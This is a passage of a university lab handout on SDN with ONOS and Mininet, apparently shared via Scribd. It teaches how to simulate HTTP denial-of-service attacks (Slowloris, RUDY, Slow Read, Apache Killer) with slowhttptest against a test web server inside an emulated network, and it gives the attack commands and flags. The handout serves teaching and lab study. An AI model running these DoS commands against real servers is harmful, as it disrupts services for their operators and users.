LabSDN ONOS Mininet

Uploaded by

yahwiasd

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

19 views

LabSDN ONOS Mininet

Uploaded by

yahwiasd

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

You are on page 1/ 7

SOFTWARE DEFINED NETWORKING

Sử dụng ONOS và mô phỏng tấn công mạng

Nhóm học phần:

1) Mã SV, Họ và tên
3)

MỤC LỤC
1. ONOS with Mininet...........................................................................................1
2. Excercise.............................................................................................................2
3. References...........................................................................................................2

>> Yêu cầu chụp hình ảnh là kết quả thực hành của SV. Không sử dụng lại hình ảnh của
bài lab.

 View the topology on http://wandertour.ddns.net:8181/onos/ui/

KhoaCNTT-Trường ĐHBK, ĐHĐN

You will only see switches in the toplogy!
 Because the Open vSwitch has not know the hosts, we are going to ping all hosts in
the Mininet
# Ping all hosts in the Mininet topology
mininet> pingall
*** Ping: testing ping reachability
h1 -> h2 h3 h4 h5 h6 h7 h8 h9
h2 -> h1 h3 h4 h5 h6 h7 h8 h9
h3 -> h1 h2 h4 h5 h6 h7 h8 h9
h4 -> h1 h2 h3 h5 h6 h7 h8 h9
h5 -> h1 h2 h3 h4 h6 h7 h8 h9
h6 -> h1 h2 h3 h4 h5 h7 h8 h9
h7 -> h1 h2 h3 h4 h5 h6 h8 h9
h8 -> h1 h2 h3 h4 h5 h6 h7 h9
h9 -> h1 h2 h3 h4 h5 h6 h7 h8
*** Results: 0% dropped (72/72 received)
mininet>

 View the topology on the Web: http://wandertour.ddns.net:8181/onos/ui

KhoaCNTT-Trường ĐHBK, ĐHĐN

 Press H to show all hosts in topology
 Press P to highlight the port of each link
 Press T to change into night mode
[1]. https://github.com/yungshenglu/onos-practice/blob/master/src/tutorials/1_install/README.md

2. DoS attack the SDN network

This tutorial will focus on attacking the ONOS SDN controller. We will use the
following attacks:
 Slow HTTP Headers (Slowloris)

 Slow HTTP Post (R-U-Dead-Yet or RUDY)

 Slow Read Attack
 Apache Killer (Range) Attack.

As you may notice this attacks are all based on application level using HTTP to attack
a server. This tutorial will focus on running and understanding the attacks, but not on the
implementation of the attacks. We will use a denial of service attack simulator
called slowhttptest it is a CLI that already has implemented this attacks so we can run
them with ease.
To verify if the installation was successful run:
user@vmsdn:~$ slowhttptest -h

KhoaCNTT-Trường ĐHBK, ĐHĐN

As you can see this command allow us to run attacks in 4 modes, each of those with
the 4 attacks that we will test. Below is the list of the attacks following with its proper
flag that need to be passed to the CLI.
 Slowloris (default): -H

 R-U-Dead-Yet or Rudy: -B
 Apache killer: -R
 Slow Read: -X

2.1. Setting up an attack

2. Run topology
Before running our topology, double check if you have the ONOS website running .
In order to run an attack we need to setup our topology with a http server to attack. To
do that please run the following commands:
user@vmsdn:~$ sudo mn --topo single,5 --controller=remote,ip=127.0.0.1,port=6653
mininet> pingall

 Above command this will run a simple topology with 5 hosts, 1 switch and it will
connect to the ONOS controller with the ONOS_IP. You can get the ONOS
controller ip from the ONOS UI.
mininet> xterm h1

 Above command this will open an emulated terminal for the host 1, which will be
our http server.
 On the h1 terminal run coomd to setup a simple http server on the host 1 that will
listen on the port 80.
root@vmsdm:~# python -m SimpleHTTPServer 80

KhoaCNTT-Trường ĐHBK, ĐHĐN

Then you can do a request to that server by running the following command:
mininet> h2 wget -O - h1
--2024-08-28 15:32:09-- http://10.0.0.1/
Connecting to 10.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2646 (2.6K) [text/html]
Saving to: ‘STDOUT’

- 0%[ ] 0 --.-KB/s
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
<li><a href=".bash_history">.bash_history</a>
<li><a href=".bash_logout">.bash_logout</a>
<li><a href=".bashrc">.bashrc</a>
...
...
<li><a href="Videos/">Videos/</a>
</ul>
<hr>
</body>
</html>
- 100%[===================>] 2.58K --.-KB/s in 0s

2024-08-28 15:32:09 (107 MB/s) - written to stdout [2646/2646]

mininet>

And we are ready to do some attacks!

KhoaCNTT-Trường ĐHBK, ĐHĐN

2.2. Running an attack
In order to start the attack from host 2 we need to open a new emulated terminal by
running xterm h2, on this new terminal we will run the default attack (Slowloris) using
the slowhttptest CLI we previously installed.
mininet> xterm h2

On windows h2, you can run the Slowloris attack by running:

root@vmsdm:~# slowhttptest -u http://10.0.0.1

After running the attack we can try a request to host 1 http server by running the
following command on the mininet terminal
mininet> h2 wget -O - h1

The request will be blocked because the attack was successful.

To run the other attacks you just add the respective flags that were explained on
the Install slowhttptest section. Below is the list with the full commands.
 Slowloris (default):